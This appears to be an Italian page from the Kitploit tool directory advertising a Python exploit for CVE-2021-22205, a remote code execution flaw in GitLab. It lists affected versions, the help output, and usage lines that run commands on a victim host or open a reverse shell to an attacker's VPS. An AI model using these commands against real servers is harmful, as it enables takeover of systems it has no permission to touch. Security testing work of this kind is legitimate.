Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-22205 — Script di exploit in Python per CVE-2021-22205 (GitLab RCE) con funzionalità di esecuzione comandi e reverse shell. Supporta getshell con un clic per i test di penetrazione. | Kitploit
Strumenti/GitHubGitHub/keven1z/cve-2021-22205
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubkeven1z/cve-2021-22205

CVE-2021-22205

Script di exploit in Python per CVE-2021-22205 (GitLab RCE) con funzionalità di esecuzione comandi e reverse shell. Supporta getshell con un clic per i test di penetrazione.

Vedi Repository
12314 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-22205

Poiché Gitlab non convalida correttamente i file immagine passati al parser di file, viene eseguito un comando arbitrario. Un attaccante può costruire una richiesta malevola per sfruttare questa vulnerabilità ed eseguire comandi arbitrari sul sistema di destinazione, portando al controllo del server Gitlab. Poiché la maggior parte degli script online non include un reverse shell, ho modificato lo script disponibile online aggiungendo una funzione per ottenere una shell con un clic.

Versioni interessate

  • 11.9 <= GitLab (CE/EE) < 13.8.8
  • 13.9 <= GitLab (CE/EE) < 13.9.6
  • 13.10 <= GitLab (CE/EE) < 13.10.3

Istruzioni per l'uso

root@kitploit:~
	  ______     _______     ____   ___ ____  _      ____  ____  ____   ___  ____  
	 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \|___ \|___ \ / _ \| ___| 
	| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ 
	| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
 	\____ |  \_/  |_____|   |_____|\___/_____|_|    |_____|_____|_____|\___/|____/ 
    	
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
                         [-p PORT]

GitLab < 13.10.3 RCE

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标URL
  -c COMMAND, --command COMMAND
                        执行命令
  --shell               是否反弹shell
  -i IP, --ip IP        反弹shell ip
  -p PORT, --port PORT  反弹shell端口

Utilizzo

root@kitploit:~
python3 CVE-2021-22205.py -t [受害者ip] --shell -i [vps ip] -p [vps port] //反弹shell
python3 CVE-2021-22205.py -t [受害者ip] -c [command] //执行命令

Dichiarazione

Questo script può essere utilizzato solo per scopi di test, non per altri scopi.

Scarica lo strumento